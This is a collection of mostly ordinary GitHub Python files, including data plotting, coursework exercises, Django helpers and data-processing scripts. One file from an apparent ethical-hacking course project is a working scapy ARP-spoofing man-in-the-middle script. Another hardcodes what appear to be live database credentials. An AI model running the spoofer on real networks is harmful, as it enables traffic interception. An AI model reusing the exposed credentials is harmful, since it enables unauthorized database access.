+{"seq_id":"2161041862","text":"import cloud_detection_new as cloud_detection\nfrom matplotlib import pyplot as plt\nimport views\nfrom skimage import exposure\n\nnir = cloud_detection.get_nir()[0:600,2000:2600]\nred = cloud_detection.get_red()[0:600,2000:2600]\ngreen = cloud_detection.get_green()[0:600,2000:2600]\nblue = cloud_detection.get_blue()[0:600,2000:2600] # or use coastal\ncoastal = cloud_detection.get_coastal()[0:600,2000:2600]\nmarine_shadow_index = (green-blue)/(green+blue)\n\nimg = views.create_composite(red, green, blue)\nimg_rescale = exposure.rescale_intensity(img, in_range=(0, 90))\n\nplt.rcParams['savefig.facecolor'] = \"0.8\"\nvmin, vmax=0.0,0.1\ndef example_plot(ax, data, fontsize=12):\n ax.imshow(data, vmin=vmin, vmax=vmax)\n ax.locator_params(nbins=3)\n ax.set_xlabel('x-label', fontsize=fontsize)\n ax.set_ylabel('y-label', fontsize=fontsize)\n ax.set_title('Title', fontsize=fontsize)\n\nplt.close('all')\nfig = plt.figure\n\n\nax1=plt.subplot(243)\nax2=plt.subplot(244)\nax3=plt.subplot(247)\nax4=plt.subplot(248)\nax5=plt.subplot(121)\n\na_coastal = coastal[500:600, 500:600]\na_blue = blue[500:600, 500:600]\na_green = green[500:600, 500:600]\na_red = red[500:600, 500:600]\na_nir = nir[500:600, 500:600]\na_img = img[500:600, 500:600]\nspec1 = [a_coastal[60, 60], a_blue[60, 60], a_green[60, 60], a_red[60, 60], a_nir[60, 60]]\n\nb_coastal = coastal[200:300, 100:200]\nb_blue = blue[200:300, 100:200]\nb_green = green[200:300, 100:200]\nb_red = red[200:300, 100:200]\nb_nir = nir[200:300, 100:200]\nb_img = img[200:300, 100:200]\n\nexample_plot(ax1, coastal)\nexample_plot(ax2, blue)\nexample_plot(ax3, green)\nexample_plot(ax4, red)\nax5.imshow(img)\n\n# plt.tight_layout()\nplt.close('all')\nspec = [b_coastal[60, 60], b_blue[60, 60], b_green[60, 60], b_red[60, 60], b_nir[60, 60]]\nplt.plot(spec, 'k*-')\nplt.plot(spec1, 'k.-')\n\nplt.close('all')\ncbg = (coastal+blue+green)/3\n\nplt.imshow(cbg/red)","repo_name":"nicholaschris/landsatpy","sub_path":"stuff.py","file_name":"stuff.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41210219641","text":"def main():\n while True:\n try:\n needs, costs, total = input1()\n output1(needs, costs, total)\n except Exception as err:\n print(err)\n\n answer = input('Would you like to run this program again? 
Enter Y or N: ')\n        while answer.upper() != 'Y' and answer.upper() != 'N':\n            answer = input('Please enter Y or N: ')\n        if answer.upper() == 'N':\n            print(f'\\nThanks for using the program')\n            break\n\n\ndef input1():\n    needs = ['Rent', 'Food', 'Transport', 'Other']\n    costs = []\n    total = 0\n    print('Welcome to the personal budget program!')\n    for items in range(len(needs)):\n        print(f'How much did you spend on {needs[items]}?')\n        cost = input('\\tEnter a positive whole number: ')\n        while cost == '0' or cost.isnumeric() is False:\n            cost = input('Use a whole number greater than 0: ')\n        costs.append(cost)\n        cost = int(cost)\n        total += cost\n\n    return needs, costs, total\n\ndef output1(needs, costs, total):\n    print('Here\\'s your overall budget:')\n    for items in range(len(needs)):\n        print('{:15}'.format(needs[items]), end='')\n    print()\n    for items in range(len(costs)):\n        print('${:<14}'.format(costs[items]), end='')\n    print()\n    print(f'Your total monthly budget is ${total:.2f}')\n\nmain()","repo_name":"mn4774jm/PycharmProjects","sub_path":"Pycharm_files/final_practice/midterm1.py","file_name":"midterm1.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2941023411","text":"#Welcome to our functioning MITM Script. \r\n#Please read the comments and change the targetIP, spoofIP, sourceMAC, destinationMac, and gatewayIP to match your two VM's\r\n#After that please save and run in command prompt with \"Sudo Python3 'File Destination'\"\r\n#CTRL + C Stops the MITM Attack\r\n\r\n\r\nimport scapy.all as scapy\r\nimport time\r\nimport argparse\r\nimport sys\r\n\r\n#Keep quotations around all the inputs\r\n\r\n#IPv4 Address of Windows Machine\r\ntargetIP = \"192.168.83.130\" \r\n\r\n#Default Gateway of Windows Machine\r\nspoofIP = \"192.168.83.2\" \r\n\r\n#ether of Kali eth0\r\nsourceMAC = \"00:0c:29:c4:64:ac\" \r\n\r\n#Physical Address of Windows Machine\r\ndestinationMac = \"00:0C:29:17:90:6B\" \r\n\r\n#Same as Spoof ID (Default Gateway of Windows Machine)\r\ngatewayIP = \"192.168.83.2\" \r\n\r\n\r\n\r\n\r\ndef spoofer(targetIP, spoofIP):\r\n    packet=scapy.ARP(op=2,pdst=targetIP,hwdst=destinationMac,psrc=spoofIP)\r\n    scapy.send(packet, verbose=False)\r\n\r\ndef restore(destinationIP, sourceIP):\r\n    packet = scapy.ARP(op=2,pdst=destinationIP,hwdst=destinationMac,psrc=sourceIP,hwsrc=sourceMAC)\r\n    scapy.send(packet, count=4,verbose=False)\r\n\r\n\r\npackets = 0\r\ntry:\r\n    while True:\r\n        spoofer(targetIP,gatewayIP)\r\n        spoofer(gatewayIP,targetIP)\r\n        print(\"\\r[+] Sent packets \"+ str(packets)),\r\n        sys.stdout.flush()\r\n        packets +=2\r\n        time.sleep(2)\r\nexcept KeyboardInterrupt:\r\n    print(\"\\nInterrupted Spoofing. Returning to normal state..\")\r\n    restore(targetIP,gatewayIP)\r\n    restore(gatewayIP,targetIP)","repo_name":"DanielWMaciejewski/Ethical_Hacking_Final","sub_path":"MITMScript.py","file_name":"MITMScript.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8299570658","text":"'''\r\n4. Write a Python program to create a list by concatenating a given list which range goes from 1\r\nto n.\r\nSample list : ['p', 'q']\r\nn =5\r\nSample Output : ['p1', 'q1', 'p2', 'q2', 'p3', 'q3', 'p4', 'q4', 'p5', 'q5']\r\n'''\r\n\r\nnum = int(input(\"Enter No. 
of items in the list: \"))\r\nli_st = []\r\nfor each in range(num):\r\n items = input(\"Enter item: \")\r\n li_st.append(items)\r\nnew_list = []\r\nx = int(input(\"Enter a number: \"))\r\nfor each in range(1, x+1):\r\n for new in li_st:\r\n new_list.append(new + str(each))\r\nprint(f\"New list: {new_list}\")\r\n","repo_name":"Rajin69930/Power-Workshop","sub_path":"Jan 19/Assignment/List/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72470306340","text":"import sys\nfrom calories.models import CalorieIntake\nfrom django.db.models import Avg\nfrom pomodoros.models import Pomodoro\nfrom steps.models import Steps\nfrom water_intake.models import WaterIntake\n\n\ndef get_quick_stats(author):\n \"\"\" Return quick stats of a user. \"\"\"\n avg_calories = CalorieIntake.objects.all().filter(author=author).aggregate(Avg('calories'))['calories__avg']\n avg_pomodoros = Pomodoro.objects.all().filter(author=author).aggregate(Avg('pomodoro'))['pomodoro__avg']\n avg_steps = Steps.objects.all().filter(author=author).aggregate(Avg('step_count'))['step_count__avg']\n avg_water_intake = WaterIntake.objects.all().filter(author=author).aggregate(Avg('drink_progress'))[\n 'drink_progress__avg']\n\n avg = [\n {\n 'icon': 'calories.png',\n 'average': round(avg_calories, 2) if avg_calories is not None else '0',\n 'description': 'Avg. calories taken.',\n 'unit': 'kcal'\n },\n {\n 'icon': 'stopwatch.png',\n 'average': round(avg_pomodoros, 2) if avg_pomodoros is not None else '0',\n 'description': 'Avg. pomodoro taken.',\n 'unit': 'pomodoro'\n },\n {\n 'icon': 'steps.png',\n 'average': round(avg_steps, 2) if avg_steps is not None else '0',\n 'description': 'Avg. steps taken.',\n 'unit': 'steps'\n },\n {\n 'icon': 'water.png',\n 'average': round(avg_water_intake, 2) if avg_water_intake is not None else '0',\n 'description': 'Avg. drink progress.',\n 'unit': 'L'\n }\n ]\n return avg\n\n\nif __name__ == '__main__':\n get_quick_stats(sys.argv)\n","repo_name":"asis2016/gesund","sub_path":"gesund/dashboard/views/quick_stats.py","file_name":"quick_stats.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39590551926","text":"Import(\"env\")\nimport os\nimport shutil\n\ndef post_program_action(source, target, env):\n\n targetfile = os.path.abspath(target[0].get_abspath())\n filename = os.path.basename(targetfile)\n startpath = os.path.dirname(targetfile)\n destpath = os.path.normpath(os.path.join(startpath, '../../../.firmware'))\n \n # if it should be placed in a subfolder of the environment (e.g. 
'd1_mini'), comment out the line above and uncomment the two below\n    #basedir = os.path.basename(startpath)\n    #destpath = os.path.normpath(os.path.join(startpath, '../../../.firmware', basedir))\n\n    print(\"\\nCopying \" + filename + \" file to the build directory...\\n\")\n    print(\"Target file: \" + targetfile)\n    print(\"Destination directory: \" + destpath)\n\n    # create directories if they don't exist\n    if not os.path.exists(destpath):\n        os.makedirs(destpath)\n\n    # copy the target file to the destination, if it exists\n    if os.path.exists(targetfile):\n        shutil.copy(targetfile, destpath)\n\nenv.AddPostAction(\"$BUILD_DIR/${PROGNAME}.bin\", post_program_action)\n","repo_name":"softwarecrash/Daly2MQTT","sub_path":"tools/post_compile.py","file_name":"post_compile.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"35"} +{"seq_id":"24387847337","text":"import numpy as np\n\n\nclass CategoryToNumeric(object):\n    \"\"\"\n    Transform class that replaces a categorical value with a representative target value\n    for instances that belong to that category. This technique is useful as a method to\n    turn categorical features into numeric values for use in an estimator, and can be\n    viewed as an alternative approach to one-hot encoding. Only suitable for regression\n    tasks.\n\n    Parameters\n    ----------\n    categorical_features : list\n        A list of integers representing the column indices to apply the transform to.\n\n    metric : {'mean', 'median', 'std'}, optional, default 'mean'\n        The method used to calculate the replacement value for a category.\n\n    Attributes\n    ----------\n    feature_map_ : dict\n        Mapping of categorical to target values.\n    \"\"\"\n    def __init__(self, categorical_features, metric='mean'):\n        self.categorical_features = categorical_features\n        self.metric = metric\n        self.feature_map_ = {}\n\n    def fit(self, X, y):\n        \"\"\"\n        Fit the transform using X as the training data and y as the label.\n\n        Parameters\n        ----------\n        X : array-like\n            Training input samples.\n\n        y : array-like\n            Target values.\n        \"\"\"\n        for i in self.categorical_features:\n            self.feature_map_[i] = {}\n            distinct = list(np.unique(X[:, i]))\n            for j in distinct:\n                if self.metric == 'mean':\n                    self.feature_map_[i][j] = y[X[:, i] == j].mean()\n                elif self.metric == 'median':\n                    self.feature_map_[i][j] = np.median(y[X[:, i] == j])\n                elif self.metric == 'std':\n                    self.feature_map_[i][j] = y[X[:, i] == j].std()\n                else:\n                    raise Exception('Metric not recognized.')\n\n    def transform(self, X):\n        \"\"\"\n        Apply the transform to the data.\n\n        Parameters\n        ----------\n        X : array-like\n            Training input samples.\n        \"\"\"\n        X_trans = np.copy(X)\n        for i in self.categorical_features:\n            distinct = list(np.unique(X_trans[:, i]))\n            for j in distinct:\n                X_trans[X_trans[:, i] == j, i] = self.feature_map_[i][j]\n\n        return X_trans\n\n    def fit_transform(self, X, y):\n        \"\"\"\n        Wrapper method that calls fit and transform sequentially.\n\n        Parameters\n        ----------\n        X : array-like\n            Training input samples.\n\n        y : array-like\n            Target values.\n        \"\"\"\n        self.fit(X, y)\n        return self.transform(X)\n","repo_name":"jdwittenauer/ionyx","sub_path":"ionyx/contrib/category_to_numeric.py","file_name":"category_to_numeric.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"29197494799","text":"import test as t\n\n# Creamos a las personas que estarán en el hospital\npersona1 = t.Persona('111A', 
'Alejandra', 'Sánchez')\ndoctor1 = t.Doctor('pediatra', persona1.dni, persona1.nombre, persona1.apellido, en_servicio=False)\ndoctor2 = t.Doctor('familia', '222A', 'Irene', 'Sanz', en_servicio=False)\n# print(doctor1)\n# print(doctor2)\nenfermero1 = t.Enfermero('maxilofacial', '333A', 'Carlos', 'Pérez', False)\nenfermero2 = t.Enfermero('urgencias', '444A', 'Álvaro', 'Gómez', False)\n# print(enfermero1)\n# print(enfermero2)\npaciente1 = t.Paciente('555A', 'Paco', 'Saura', ['falta olfato', 'dolor cabeza'])\npaciente2 = t.Paciente('666A', 'Marta', 'San Miguel', ['dolor de tobillo', 'inflamación en la zona'])\npaciente3 = t.Paciente('777A', 'Lucía', 'Del Romero', ['fiebre', 'diarrea'])\npaciente4 = t.Paciente('888A', 'Inma', 'Luque', ['dolor garganta', 'dolor cabeza'])\n\nconsulta1 = t.Consulta('1')\nconsulta2 = t.Consulta('2')\n# print(consulta1)\n# print(consulta2)\n# Los trabajadores creados entran a trabajar (fichan)\ndoctor1.fichar()\ndoctor2.fichar()\nenfermero1.fichar()\nenfermero2.fichar()\n# print(doctor1)\n# print(doctor2)\n# print(enfermero1)\n# print(enfermero2)\nconsulta1.add_doctor(doctor1)\nconsulta2.add_doctor(doctor2)\n# print(consulta1)\n# print(consulta2)\n\nsala_espera = [paciente1, paciente2, paciente3, paciente4]\nenfermos_en_habitacion = []\nenfermos_en_pasillo = []\nlista_enfermeros = [enfermero1, enfermero2]\nlista_consultas = [consulta1, consulta2]\n\n# Aquí empieza el proceso de tratar pacientes\nturno_enfermero = 0\nwhile len(sala_espera) > 0:\n    print('========Empieza la consulta===========')\n    esta_enfermo = True\n    # El enfermero correspondiente atiende al paciente (le manda a la consulta correspondiente)\n    lista_enfermeros[turno_enfermero % 2].atender_paciente(sala_espera, lista_consultas[turno_enfermero % 2])\n    # Comprobamos que haya un doctor en la consulta y este le diagnostica\n    if lista_consultas[turno_enfermero % 2].doctor is not None:\n        esta_enfermo, enfermedad = lista_consultas[turno_enfermero % 2].doctor.diagnosticar(\n            lista_consultas[turno_enfermero % 2].paciente)\n        # Creamos un enfermo (puede ser un cuentista)\n        enfermo = t.Enfermo(enfermedad, lista_consultas[turno_enfermero % 2].paciente.dni,\n                            lista_consultas[turno_enfermero % 2].paciente.nombre,\n                            lista_consultas[turno_enfermero % 2].paciente.apellido,\n                            lista_consultas[turno_enfermero % 2].paciente.sintomas)\n        # Aquí decidimos si le mandamos a la habitación, al pasillo o a su casa\n        if esta_enfermo and len(enfermos_en_habitacion) < 3:\n            print('Diríjase a la habitación, {}. Usted tiene {}.'.format(\n                lista_consultas[turno_enfermero % 2].paciente.nombre, enfermedad))\n            enfermos_en_habitacion.append(enfermo)\n        elif not esta_enfermo:\n            print('No me haga perder mi valioso tiempo, {}. Usted tiene {}.'.format(\n                lista_consultas[turno_enfermero % 2].paciente.nombre, enfermedad))\n        else:\n            print(\n                '{}, usted tiene {}. Lo siento pero le van a dejar temporalmente el pasillo. Este es el estado de la '\n                'sanidad pública en Madrid.'.format(\n                    lista_consultas[turno_enfermero % 2].paciente.nombre, enfermedad))\n            enfermos_en_pasillo.append(enfermo)\n        # Aquí el paciente sale de la consulta\n        print(consulta1)\n        print(consulta2)\n        lista_consultas[turno_enfermero % 2].despachar_paciente()\n    else:\n        print('La consulta {} está vacía. 
Llamen a un doctor ahora mismo, el paciente {} le está esperando'.format(\n            lista_consultas[turno_enfermero % 2].id_number, lista_consultas[turno_enfermero % 2].paciente.nombre))\n    turno_enfermero += 1\n    print('========Termina la consulta===========')\n    # print(consulta1)\n    # print(consulta2)\n    # print(esta_enfermo)\n    # print(consulta1)\n    # print(consulta2)\n    # print(len(sala_espera))\n    # print(sala_espera)\n\nconsulta1.salir_doctor()\nconsulta2.salir_doctor()\nenfermero1.fichar()\nenfermero2.fichar()\n\nprint('\\nLa sala de espera tiene {} paciente'.format(len(sala_espera)))\nprint('\\nEn la habitación están los siguientes pacientes:')\nfor enfermo in enfermos_en_habitacion:\n    print(enfermo)\n\nif len(enfermos_en_pasillo) > 0:\n    print('\\nEn el pasillo están los siguientes pacientes:')\n    for enfermo in enfermos_en_pasillo:\n        print(enfermo)\nelse:\n    print('\\nEn el pasillo no hay pacientes')\n","repo_name":"lanadongonzalez/PyCharm-curso-Ibertech","sub_path":"Hospital separando clases/Ejercicio 8 Hospital.py","file_name":"Ejercicio 8 Hospital.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"160916567","text":"data = open(\"../input/day-5.txt\", \"r\")\n\nstacks = []\nstack_lines = []\n# First convert the raw table into a list of lists, then we can convert\n# to a list of stacks to make it easier to work with.\nfor i in range(0, 8):\n    line = data.readline()\n    columns = []\n    # 36 chars per line, 4 chars per column\n    for j in range(0, 36, 4):\n        chars = line[j:j + 4]\n        chars = chars.translate({ord(c): None for c in '[]'}).strip()\n        columns.append(chars if chars != \"\" else None)\n    stack_lines.append(columns)\n\ndata.readline() # Skip the column labels\ndata.readline() # Skip the empty line\n\n# Now convert the raw table into a list of stacks.\nfor col in range(0, 9):\n    stack = []\n    for row in range(7, -1, -1):\n        cell = stack_lines[row][col]\n        if cell is not None:\n            stack.append(cell)\n    stacks.append(stack)\n\n\nwhile True:\n    line = data.readline()\n    if line == \"\":\n        break\n    # Instruction example: move 2 from 7 to 2\n    instruction = line.split(\" \")\n    (count, source, destination) = [int(x) for x in instruction if x.rstrip().isdigit()]\n    for i in range(0, count):\n        stacks[destination - 1].append(stacks[source - 1].pop())\ndata.close()\n\nprint(f\"Stacks: {stacks}\")\ntop_crates = [stack.pop() for stack in stacks]\nprint(f\"Top crates: {''.join(top_crates)}\")\n","repo_name":"joebutler2/advent-of-code-2022","sub_path":"src/day-5.py","file_name":"day-5.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71877751461","text":"'''\nCreated on Jan 31, 2019\n\n@author: hzhang0418\n'''\n\n'''\nProcess datasets from Han\n'''\n\nimport os\n\nimport py_entitymatching as em\n\nimport v3.feature_generation as fg\n\nimport utils.mycsv\nimport utils.myconfig\n\ndef process(basedir):\n    \n    pass\n\ndef prepare_labeled_data(basedir):\n    \n    train_file = os.path.join(basedir, 'train.csv')\n    valid_file = os.path.join(basedir, 'valid.csv')\n    test_file = os.path.join(basedir, 'test.csv')\n    \n    labeled_data = utils.mycsv.read_csv_as_list(train_file) \n    labeled_data.extend( utils.mycsv.read_csv_as_list(valid_file) )\n    labeled_data.extend( utils.mycsv.read_csv_as_list(test_file) )\n    \n    print(len(labeled_data))\n    print(labeled_data[0])\n    \n    for i, data in enumerate(labeled_data, 1):\n        data['_id'] = i\n        data['label'] 
= data['gold']\n data['ltable.id'] = data['ltable_id']\n data['rtable.id'] = data['rtable_id']\n \n fieldnames = ['_id', 'ltable.id', 'rtable.id', 'label']\n \n output_file = 'labeled_data.csv'\n utils.mycsv.write_list_to_csv(labeled_data, fieldnames, os.path.join(basedir, output_file))\n \ndef prepare_features(config_file):\n params = utils.myconfig.read_config(config_file)\n fg.generate_features(params)\n \n \ndef test():\n basedir = r'/scratch/hzhang0418/Datasets from Han/Clothing'\n basedir = r'/scratch/hzhang0418/Datasets from Han/Home'\n basedir = r'/scratch/hzhang0418/Datasets from Han/Electronics'\n basedir = r'/scratch/hzhang0418/Datasets from Han/Tools'\n prepare_labeled_data(basedir)\n \n \ndef test2():\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/clothing.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/home.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/electronics.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/tools.config'\n \n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_clothing.config'\n #config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_home.config'\n #config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_electronics.config'\n #config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_tools.config'\n \n prepare_features(config_file)\n \n \ndef find_attributes_to_drop(table_A, table_B, perc = 0.1):\n \n attr_to_drop = set()\n \n size = len(table_A)\n for col in table_A:\n num_null = table_A[col].isnull().sum()\n if num_null>=size*perc:\n attr_to_drop.add(col)\n \n size = len(table_B)\n for col in table_B:\n num_null = table_B[col].isnull().sum()\n if num_null>=size*perc:\n attr_to_drop.add(col) \n \n return list(attr_to_drop)\n \ndef test3():\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/clothing.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/home.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/electronics.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/tools.config'\n \n # read config\n params = utils.myconfig.read_config(config_file)\n # base dir\n basedir = params['basedir']\n # path for table A, B, G, H\n apath = os.path.join(basedir, params['apath'])\n bpath = os.path.join(basedir, params['bpath'])\n \n table_A = em.read_csv_metadata(apath, key='id')\n table_B = em.read_csv_metadata(bpath, key='id') \n \n\n attr_to_drop = find_attributes_to_drop(table_A, table_B, 0.05)\n print(attr_to_drop)\n \n table_A.drop(columns=attr_to_drop, inplace=True)\n table_B.drop(columns=attr_to_drop, inplace=True)\n\n apath_new = os.path.join(basedir, r'trunc_'+params['apath'])\n bpath_new = os.path.join(basedir, r'trunc_'+params['bpath'])\n \n table_A.to_csv(apath_new, index=False)\n table_B.to_csv(bpath_new, index=False)\n \ndef test4():\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_clothing.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_home.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_electronics.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_tools.config'\n \n # read config\n params = utils.myconfig.read_config(config_file)\n # base dir\n basedir = params['basedir']\n # path for table A, B, G, H\n apath = os.path.join(basedir, params['apath'])\n bpath = os.path.join(basedir, params['bpath'])\n gpath = 
os.path.join(basedir, params['gpath'])\n \n table_A = em.read_csv_metadata(apath, key='id')\n table_B = em.read_csv_metadata(bpath, key='id') \n \n table_A_missing_ids = set()\n for col in table_A:\n ids = set(table_A[table_A[col].isnull()]['id'].values)\n table_A_missing_ids.update(ids)\n \n table_B_missing_ids = set()\n for col in table_B:\n ids = set(table_B[table_B[col].isnull()]['id'].values)\n table_B_missing_ids.update(ids)\n \n print(len(table_A_missing_ids))\n print(len(table_B_missing_ids))\n \n tmp_A = table_A[~table_A['id'].isin(table_A_missing_ids)]\n tmp_B = table_B[~table_B['id'].isin(table_B_missing_ids)]\n \n table_G = em.read_csv_metadata(gpath, key='_id', ltable = table_A, rtable = table_B, fk_ltable='ltable.id', fk_rtable='rtable.id')\n tmp_G = table_G[ ~table_G['ltable.id'].isin(table_A_missing_ids)]\n tmp_G = tmp_G[~tmp_G['rtable.id'].isin(table_B_missing_ids)]\n print(len(table_G), len(tmp_G))\n \n tmp_A.to_csv(apath, index=False)\n tmp_B.to_csv(bpath, index=False)\n tmp_G.to_csv(gpath, index=False)\n \n \ndef merge(basedir):\n train_file = os.path.join(basedir, '_train_feat_vecs.csv')\n valid_file = os.path.join(basedir, '_valid_feat_vecs.csv')\n test_file = os.path.join(basedir, '_test_feat_vecs.csv')\n \n features = utils.mycsv.read_csv_as_list(train_file) \n features.extend( utils.mycsv.read_csv_as_list(valid_file) )\n features.extend( utils.mycsv.read_csv_as_list(test_file) )\n \n for k, f in enumerate(features):\n f['_id'] = k\n f['ltable.id'] = f['ltable_id']\n f['rtable.id'] = f['rtable_id']\n \n fieldnames = list(features[0].keys())\n fieldnames.remove('ltable_id')\n fieldnames.remove('rtable_id')\n \n output_file = 'feature_vector_tfidf.csv'\n utils.mycsv.write_list_to_csv(features, fieldnames, os.path.join(basedir, output_file))\n \ndef test5():\n basedir = r'/scratch/hzhang0418/temp_feat/Clothing'\n basedir = r'/scratch/hzhang0418/temp_feat/Home'\n basedir = r'/scratch/hzhang0418/temp_feat/Electronics'\n #basedir = r'/scratch/hzhang0418/temp_feat/Tools'\n \n merge(basedir)\n\n \n \n ","repo_name":"qcri/scrubber","sub_path":"src/v4/dataset_dl.py","file_name":"dataset_dl.py","file_ext":"py","file_size_in_byte":6790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73030978339","text":"'''\nGordon Doore\n06/14/2023\ncsv_to_sql.py\nThis script provides a function for incrementing CSV IDs and \ninserting the updated data into a MySQL database table.\n'''\n\nimport csv\nimport mysql.connector\n\ndef increment_csv_ids(table_name, csv_file_path, db_config):\n # Establish a connection to the database\n cnx = mysql.connector.connect(**db_config)\n cursor = cnx.cursor()\n print(\"connection success\")\n # Step 1: Retrieve the maximum value of the id column from the table\n select_query = f\"SELECT MAX(id) FROM {table_name}\"\n cursor.execute(select_query)\n max_id = cursor.fetchone()[0]\n if max_id is None:\n max_id = -1\n print(\"max_id is\"+str(max_id))\n\n # Step 2: Read the CSV file and update the id column values\n updated_rows = []\n with open(csv_file_path, 'r') as file:\n csv_data = csv.reader(file)\n next(csv_data) # Skip the header row\n\n for row in csv_data:\n row[0] = int(row[0]) + max_id + 1 # Increment the id value\n updated_rows.append(row)\n\n # Step 3: Insert the updated data from the CSV into the table\n placeholders = ','.join(['%s'] * len(updated_rows[0]))\n insert_query = f\"INSERT INTO {table_name} VALUES ({placeholders})\"\n cursor.executemany(insert_query, updated_rows)\n\n # 
Commit the changes\n cnx.commit()\n print(\"committed\")\n # Close the cursor and connection\n cursor.close()\n cnx.close()\n\nif __name__ == \"__main__\":\n # Database credentials\n db = {\n 'user': 'doadmin',\n 'password': 'AVNS_UXdKjBYJzYULsF8uJnC',\n 'host': 'c3-database-do-user-914951-0.b.db.ondigitalocean.com',\n 'database': 'C3_Database',\n 'port': 25060\n }\n TABLE = 'C3Macro'\n CSV = 'test.csv'\n increment_csv_ids(TABLE,CSV,db)","repo_name":"coast-cow-consumer/Dairy-One-csv-sql-connect","sub_path":"csv_to_sql.py","file_name":"csv_to_sql.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1013334527","text":"import markovify\nimport os\nimport nltk\nimport re\n\ndirname = os.path.dirname(os.path.abspath(__file__))\ntweets = os.path.join(dirname, 'tweets.txt')\n\nwith open(tweets) as f:\n text = f.read()\n\n\n\nclass POSifiedText(markovify.Text):\n def word_split(self, sentence):\n words = re.split(self.word_split_pattern, sentence)\n words = [ \"::\".join(tag) for tag in nltk.pos_tag(words) ]\n return words\n\n def word_join(self, words):\n sentence = \" \".join(word.split(\"::\")[0] for word in words)\n return sentence\n\n\ntext_model = markovify.Text(text)\n\nprint(text_model.make_short_sentence(280))","repo_name":"nuala-odonovan/anabot","sub_path":"anabot.py","file_name":"anabot.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70052952102","text":"from .constants import T5_SPARQL_DECODINGS, T5_SPARQL_ENCODINGS\nfrom .utils import replace_multi\n\n\ndef remove_prefixes(text: str):\n # PREFIX prefix: \n while True:\n idx = text.find(\"PREFIX\")\n if idx < 0:\n break\n\n idx = text.find(\">\", idx)\n text = text[idx + 1 :]\n\n return text\n\n\ndef preprocess_sparql(text: str):\n text = remove_prefixes(text)\n text = replace_multi(text, T5_SPARQL_ENCODINGS)\n return text\n\n\ndef postprocess_sparql(text: str):\n text = replace_multi(text, T5_SPARQL_DECODINGS)\n return text\n","repo_name":"picas9dan/nl2sparql-webapp","sub_path":"marie_fastapi/services/translate/data_processing/sparql.py","file_name":"sparql.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21647762352","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 07/09/17\n\n@author: Maurizio Ferrari Dacrema\n\"\"\"\n\nfrom SLIM_BPR2.Base.Recommender import Recommender\nfrom SLIM_BPR2.Base.Incremental_Training_Early_Stopping import Incremental_Training_Early_Stopping\nfrom SLIM_BPR2.Base.Evaluation.Evaluator import SequentialEvaluator\n\nimport subprocess\nimport os, sys\nimport time, pickle\nimport numpy as np\n\n\n\n\nclass MatrixFactorization_Cython(Recommender, Incremental_Training_Early_Stopping):\n\n RECOMMENDER_NAME = \"MatrixFactorization_Cython_Recommender\"\n\n\n def __init__(self, URM_train, positive_threshold=4, URM_validation = None, recompile_cython = False, algorithm = \"MF_BPR\"):\n\n\n super(MatrixFactorization_Cython, self).__init__()\n\n\n self.URM_train = URM_train\n self.n_users = URM_train.shape[0]\n self.n_items = URM_train.shape[1]\n self.normalize = False\n\n self.algorithm = algorithm\n\n self.positive_threshold = positive_threshold\n\n if URM_validation is not None:\n self.URM_validation = URM_validation.copy()\n else:\n self.URM_validation = None\n\n 
